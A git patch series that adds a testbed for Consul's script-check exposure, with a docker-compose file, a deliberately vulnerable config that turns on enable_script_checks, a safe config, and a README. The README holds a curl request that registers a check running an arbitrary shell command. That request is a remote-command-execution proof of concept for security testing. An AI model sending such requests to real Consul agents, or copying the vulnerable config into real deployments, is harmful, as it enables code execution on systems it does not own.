From e340b7030a02da2b880ab6364ec91e54e026dff4 Mon Sep 17 00:00:00 2001 From: Robert Dick Date: Fri, 29 May 2026 09:29:50 -0400 Subject: [PATCH 1/3] added testbed for consul script checks --- hashicorp/consul/README.md | 23 +++++++++++++++++++++++ hashicorp/consul/docker-compose.yaml | 21 +++++++++++++++++++++ hashicorp/consul/safe.hcl | 11 +++++++++++ hashicorp/consul/vuln.hcl | 11 +++++++++++ 4 files changed, 66 insertions(+) create mode 100644 hashicorp/consul/README.md create mode 100644 hashicorp/consul/docker-compose.yaml create mode 100644 hashicorp/consul/safe.hcl create mode 100644 hashicorp/consul/vuln.hcl diff --git a/hashicorp/consul/README.md b/hashicorp/consul/README.md new file mode 100644 index 00000000..a29b8161 --- /dev/null +++ b/hashicorp/consul/README.md @@ -0,0 +1,23 @@ +# Consul Exposed UI (Exposed API) +This testbed contains vulnerable and safe containers for Consul. The vulnerable version has `-enable-script-checks` and the safe version lacks it. + + +## Docker Compose +``` +docker compose up +``` +The vulnerable service will be on port 8081 and the safe service will be on port 8082. + +## Confirming the vulnerability + +``` +curl -H 'Content-Type: application/json' -X PUT \ + -d '{ + "Name": "test", + "check": { + "Args": ["sh", "-c", "curl curl "], + "interval": "10s", + "Timeout": "600s" + } + }' localhost:8081/v1/agent/service/register +``` \ No newline at end of file diff --git a/hashicorp/consul/docker-compose.yaml b/hashicorp/consul/docker-compose.yaml new file mode 100644 index 00000000..e90a963d --- /dev/null +++ b/hashicorp/consul/docker-compose.yaml @@ -0,0 +1,21 @@ +version: "3.8" + +services: + consul-vuln: + image: consul:1.2.3 + container_name: consul-vuln + ports: + - "8081:8500" + volumes: + - ./vuln.hcl:/consul/config/vuln.hcl + command: agent -config-file=/consul/config/vuln.hcl + + consul-safe: + image: consul:1.2.3 + container_name: consul-safe + ports: + - "8082:8500" + volumes: + - ./safe.hcl:/consul/config/safe.hcl + command: agent -config-file=/consul/config/safe.hcl + diff --git a/hashicorp/consul/safe.hcl b/hashicorp/consul/safe.hcl new file mode 100644 index 00000000..4cef9455 --- /dev/null +++ b/hashicorp/consul/safe.hcl @@ -0,0 +1,11 @@ +datacenter = "dc1" +data_dir = "/consul/data" + +server = true +bootstrap_expect = 1 + +enable_script_checks = false + +client_addr = "0.0.0.0" + +ui = true diff --git a/hashicorp/consul/vuln.hcl b/hashicorp/consul/vuln.hcl new file mode 100644 index 00000000..4797ffa8 --- /dev/null +++ b/hashicorp/consul/vuln.hcl @@ -0,0 +1,11 @@ +datacenter = "dc1" +data_dir = "/consul/data" + +server = true +bootstrap_expect = 1 + +enable_script_checks = true + +client_addr = "0.0.0.0" + +ui = true From a7ff95e6fe16114f6458a4dd4d806b6369af226d Mon Sep 17 00:00:00 2001 From: Robert Dick Date: Fri, 5 Jun 2026 07:44:30 -0400 Subject: [PATCH 2/3] Update hashicorp/consul/README.md Co-authored-by: Giacomo Coluccelli --- hashicorp/consul/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hashicorp/consul/README.md b/hashicorp/consul/README.md index a29b8161..750b8eee 100644 --- a/hashicorp/consul/README.md +++ b/hashicorp/consul/README.md @@ -15,7 +15,7 @@ curl -H 'Content-Type: application/json' -X PUT \ -d '{ "Name": "test", "check": { - "Args": ["sh", "-c", "curl curl "], + "Args": ["sh", "-c", "curl "], "interval": "10s", "Timeout": "600s" } From 61a9724c7066f56e8a98381fdf7fead4225ada5b Mon Sep 17 00:00:00 2001 From: Robert Dick Date: Fri, 5 Jun 2026 07:44:36 -0400 Subject: [PATCH 3/3] Update hashicorp/consul/README.md Co-authored-by: Giacomo Coluccelli --- hashicorp/consul/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hashicorp/consul/README.md b/hashicorp/consul/README.md index 750b8eee..4ebb625c 100644 --- a/hashicorp/consul/README.md +++ b/hashicorp/consul/README.md @@ -17,7 +17,7 @@ curl -H 'Content-Type: application/json' -X PUT \ "check": { "Args": ["sh", "-c", "curl "], "interval": "10s", - "Timeout": "600s" + "timeout": "600s" } }' localhost:8081/v1/agent/service/register ``` \ No newline at end of file